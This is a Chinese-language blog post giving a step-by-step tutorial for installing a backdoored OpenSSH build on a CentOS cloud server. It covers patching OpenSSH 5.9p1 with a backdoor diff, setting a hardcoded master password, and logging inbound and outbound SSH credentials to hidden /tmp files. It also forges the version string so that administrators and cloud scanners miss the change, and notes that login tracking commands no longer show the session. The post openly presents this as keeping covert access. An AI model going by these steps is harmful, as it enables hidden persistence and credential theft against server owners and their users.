梅志克斯-matrix 's Blog
梅志克斯-matrix 专注Linux DevOps、AIOPS,SRE,SaltStack,OpenStack,Zabbix,Docker,ELK,LogStash
Toggle navigation
梅志克斯-matrix 's Blog
主页
Linux
运维相关
Windows
个人收藏
About Me
归档
标签
linux影子账户,ssh后门账户,ssh维持权限
linux影子账户,ssh后门账户,ssh维持权限
? Linux ?
? 运维 ?
2022-11-12 05:55:57
289
0
0
172721404
? Linux ?
? 运维 ?
#SSH后门万能密码,linux影子账户,ssh后门密码 --- ###标题如上,就是在linux的系统中留下一个后门账户,方便日后维护及相关信息搜索。如果直接留下后门会很容易被阿里云、腾讯云扫描到,所以做好的留一个万能密码在系统。 --- ```废话不多说了,我们开始。。。。``` >先说下测试环境: >云厂商:阿里云 >系统:Centos 7.9 x64 >内存:随意 >硬盘:随意 >原ssh版本:OpenSSH_7.4p1, OpenSSL 1.0.2k-fips 26 Jan 2017 ![](https://leanote.com/api/file/getImage?fileId=636eadd4ab64411710a5eb0f) ---- **第一步:上传和谐版到服务器root目录,此时我是目录,自行更改。** ![](https://leanote.com/api/file/getImage?fileId=636ea823ab64411710a5eae9) ![](https://leanote.com/api/file/getImage?fileId=636eaebdab64411710a5eb1a) > openssh-5.9p1.tar.gz-----------------(正常的openssh包) > 0x06-openssh-5.9p1.patch.tar.gz------(补丁包) --- **第二步:一些必要额准备工作,后面会用到。** ###首先查看一下SSH的版本号,记录下来 >```ssh -V``` ![](https://leanote.com/api/file/getImage?fileId=636eae5aab64411710a5eb13) --- **第三步:解压相关的文件。*** >```tar zxvf openssh-5.9p1.tar.gz``` >```tar zxvf 0x06-openssh-5.9p1.patch.tar.gz``` ![](https://leanote.com/api/file/getImage?fileId=636eb1a7ab64411710a5eb31) --- **第四步:打补丁,注入后门** >复制“openssh-5.9p1.patch”目录下的“sshbd5.9p1.diff”文件到“openssh-5.9p1”下。 ![](https://leanote.com/api/file/getImage?fileId=636eb1a7ab64411710a5eb32) --- **第五步:打补丁,此处如果提示“patch 未找到命令”;执行```yum -y install patch```安装即可。** >```patch < sshbd5.9p1.diff ```----------打补丁命令 ![](https://leanote.com/api/file/getImage?fileId=636eb1faab64411710a5eb35) --- **第六步:修改后门密码(修改隐藏密码)** >```vi includes.h```---------修改后门密码命令 ![](https://leanote.com/api/file/getImage?fileId=636eb3f6ab64411710a5eb41) **直接找到“includes.h”最后就好!** >```177 #define ILOG "/tmp/.ilog"``` >```178 #define OLOG "/tmp/.olog"``` >```179 #define SECRETPW "admin123"``` --- >179行:SECRETPW 是万能密码可以自己修改; >177行:ILOG 是记录登录到本机的用户名和密码; >178行:OLOG 是记录本机登录到远程的用户名和密码。 **注意:此处可以看到在图片里ilog、olog前面都没有加“点”的字符,这里熟悉linux的朋友都知道,点的意思就是隐藏的意思,这样更不容易察觉。** --- **第七步,隐藏版号,避免被察觉。** >```vim version.h```----------修改SSH版本好,使其版本一致不易被管理员发现和察觉。 ![](https://leanote.com/api/file/getImage?fileId=636eb6cfab64411709a79893) **注意:这里应该记得吧,在第二步的时候我们就查询了原有系统的版本号,如上图红色是原文件默认的版本,蓝色箭头是我们需要的版本,此处看到两个一样的参数,是为了更好的展示给大家看故意复制的,后面是需要删除的,不要学我哦~~** --- **第八步:安装编译环境** >yum install -y openssl openssl-devel pam-devel >yum install zlib-devel >yum install gcc >yum install gcc-c++ >yum install openssl >yum install openssl-devel **这里可能注意到有重复的命令,不用担心多执行一次也是没关系的,有的时候先后顺序的影响都会影响成功失败。** ![](https://leanote.com/api/file/getImage?fileId=636ebbd4ab64411709a798b4) **上图可以看出默认就已经安转过了,再次安装的时候提示不需要更新,多执行一次也无妨,此处我们可以用“echo $?”检查命令执行情况,返回的数值只要等于“0”就说明没有错误,凡是大于“0”都是不行的。** --- **第九步:配置相关参数及文件** >```./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5``` ![](https://leanote.com/api/file/getImage?fileId=636ebd75ab64411709a798bd) >**配置大概在1分钟以内,见上图说明没有问题,可以继续洗衣歌步骤。** --- **第十步:编译及安装** >**```先执行“make”完成无报错后执行“make install”```** ![](https://leanote.com/api/file/getImage?fileId=636ebf11ab64411710a5eb92) >**"make"见上图编译完成,大概需要1分钟。** ![](https://leanote.com/api/file/getImage?fileId=636ebfa1ab64411709a798cc) >**"make install"大概需要10秒钟,见到上图及“[RSA1 2048]”代表本系列操作全部完成。接下来就是验证阶段了。** --- **第十一步:验证及问题总结** >**注意:在我测试阶段使用腾讯云出现了重启无法连接服务器的情况,经过查阅资料可能是以下文件权限问题造成,可在“第十步”之前执行下面命令。** >```chmod 620 moduli``` >```chmod 600 sshd_config ssh_host_ecdsa_key ssh_host_rsa_key``` >```chmod 644 ssh_config ssh_host_ecdsa_key.pub ssh_host_rsa_key.pub``` --- >**此种方法后会出现SSHD服务无法通过“systemctl”、“service”重启的情况,但是重启服务器可正常使用,到写本文是未找到解决方法。见下图** ![](https://leanote.com/api/file/getImage?fileId=636ec2cdab64411709a798e1) >**虽然此种方法不是特别的完美,但是比较欣慰的是"w"、"id"、"whoami"等命令均无法查出登录的详情,见下图就知道了。** ![](https://leanote.com/api/file/getImage?fileId=636ec428ab64411709a798eb) --- >###心得:好了,好久没写文章了,今晚有时间加了个班写了一篇,也是鼓励我自己,不管什么时候什么事情都是有转机及机会的,但是态度必须先拿出来,不管前面多少艰难险阻,只要有持之以恒的心,事情总会出现转机!做一个乐天派!卷嘛!卷死他们!加油!奋斗吧!
上一篇:
新手对IDA CE OD XDUG的理解及认知
下一篇:
【亲测】Windows共享文件夹(CIFS)挂载到linux,开机自动挂载
梅志克斯,Zabbix,Matrix,nginx,linux运维,Docker,菜鸟学习linux
0
赞
289 人读过
新浪微博
微信
腾讯微博
QQ空间
人人网
Please enable JavaScript to view the
comments powered by Disqus.
comments powered by
Disqus
文档导航